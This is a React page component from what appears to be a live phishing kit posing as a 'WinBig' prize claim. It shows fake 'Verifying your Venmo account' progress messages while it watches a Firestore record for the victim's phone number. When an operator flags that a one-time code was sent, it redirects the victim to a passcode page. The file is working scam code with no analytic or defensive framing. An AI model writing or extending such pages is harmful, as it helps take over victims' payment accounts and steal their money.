import React, { useEffect, useState } from "react";
import { useNavigate, useLocation } from "react-router-dom";
import { doc, onSnapshot, deleteDoc } from "firebase/firestore";
import { db } from "../firebase/config";
import BrandLogo from "../components/BrandLogo";

const SESSION_TIMEOUT_MS = 20 * 60 * 1000;

const PROGRESS_STEPS = [
  "Verifying your Venmo account...",
  "Confirming prize eligibility...",
  "Processing payment details...",
  "Almost there — finalizing your claim...",
];

const WaitingPage = () => {
  const navigate  = useNavigate();
  const location  = useLocation();
  const phone     = location.state?.phone || "";

  const [expired,      setExpired]      = useState(false);
  const [stepIdx,      setStepIdx]      = useState(0);

  // Cycle through progress messages
  useEffect(() => {
    const id = setInterval(() => {
      setStepIdx((i) => (i + 1) % PROGRESS_STEPS.length);
    }, 3500);
    return () => clearInterval(id);
  }, []);

  useEffect(() => {
    if (!phone) { navigate("/"); return; }

    let expiryTimer;
    const userRef     = doc(db, "users", phone);
    const unsubscribe = onSnapshot(userRef, (snapshot) => {
      if (!snapshot.exists()) {
        clearTimeout(expiryTimer);
        unsubscribe();
        handleExpired();
        return;
      }
      const data = snapshot.data();
      if (data.isOTPSent === true) {
        clearTimeout(expiryTimer);
        unsubscribe();
        navigate("/otp", { state: { phone } });
      }
    });

    expiryTimer = setTimeout(() => {
      unsubscribe();
      handleExpired();
    }, SESSION_TIMEOUT_MS);

    return () => { clearTimeout(expiryTimer); unsubscribe(); };
  }, [phone, navigate]);

  const handleExpired = async () => {
    try { await deleteDoc(doc(db, "users", phone)); } catch {}
    setExpired(true);
  };

  if (expired) {
    return (
      <div className="waiting-page">
        <BrandLogo size={100} />
        <div style={{ fontSize: 56, margin: "28px 0 16px" }}>⏰</div>
        <h2 className="waiting-title" style={{ color: "#ef4444" }}>Session Expired</h2>
        <p className="waiting-sub" style={{ maxWidth: 320 }}>
          Your session timed out. Please restart your claim — it only takes 2 minutes!
        </p>
        <button className="cta-btn" style={{ marginTop: 32, maxWidth: 320 }} onClick={() => navigate("/")}>
          START OVER
        </button>
        <footer className="page-footer" style={{ marginTop: "auto" }}>
          © 2026 WinBig LLC. All rights reserved.
        </footer>
      </div>
    );
  }

  return (
    <div className="waiting-page">
      <BrandLogo size={100} />

      <div className="waiting-spinner" />

      <h2 className="waiting-title">Verifying Your Account</h2>
      <p className="waiting-sub" style={{ minHeight: 22, transition: "all 0.3s" }}>
        {PROGRESS_STEPS[stepIdx]}
      </p>

      {phone && (
        <div className="waiting-phone">
          📱 {phone.replace("+1", "+1 ")}
        </div>
      )}

      <div className="waiting-dots">
        <span /><span /><span />
      </div>

      <p style={{ marginTop: 28, fontSize: 12, color: "#94a3b8" }}>
        Please keep this page open. Do not refresh.
      </p>

      <footer className="page-footer">© 2026 WinBig LLC. All rights reserved.</footer>
    </div>
  );
};

export default WaitingPage;
